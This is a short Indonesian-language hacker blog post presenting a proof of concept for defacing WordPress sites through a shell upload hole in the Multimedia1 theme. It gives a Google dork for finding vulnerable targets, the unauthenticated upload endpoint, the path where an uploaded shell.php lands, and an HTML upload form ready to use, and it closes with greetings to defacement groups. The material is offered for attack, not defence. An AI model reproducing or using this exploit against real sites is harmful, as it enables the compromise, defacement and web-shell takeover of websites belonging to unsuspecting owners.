News Ticker

Deface Wordpress Themes Multimedia1

By Berandal - Thursday, March 30, 2017 No Comments

 Deface Wordpress Themes Multimedia1

 

Hello sobat maxteroit, kali ini saya (Berandal) akan share my new POC about deface wordpress, metodenya yaitu Wordpress themes multimedia1 shell upload vulnerability.
Berikut dokumentasi yg telah saya upload ke web tempat upload poc hacking :

   
Wordpress Themes Multimedia1 Shell Upload Vulnerability | CSRF
Author : Berandal
Google Dork: inurl:/wp-content/themes/multimedia1/
Tested on: Win 7, Linux
Blog : http://www.maxteroit.com/

+-+-+-+-+-+-+-+-+
|B|e|r|a|n|d|a|l|
+-+-+-+-+-+-+-+-+

[!] Exploit : http://127.0.0.1/wp-content/themes/multimedia1/server/php/

[!] File Location : http://127.0.0.1/wp-content/themes/multimedia1/server/php/files/shell.php
[*] CSRF:
<html>
<body>
<form enctype="multipart/form-data" action="127.0.0.1/wp-content/themes/multimedia1/server/php/" method="post">
Your File: <input name="files[]" type="file" /><br />
<input type="submit" value="SIKAT!" />
</form>
</body>
</html>


[*] ABOUT:

Facebook: https://www.facebook.com/owlsquad.id
Twitter: https://www.twitter.com/id_berandal
Greetz : All Official Member OWL SQUAD - Hacker Patah Hati - Alone Clown Security - and All Indonesian Defacer.

No Comment to " Deface Wordpress Themes Multimedia1 "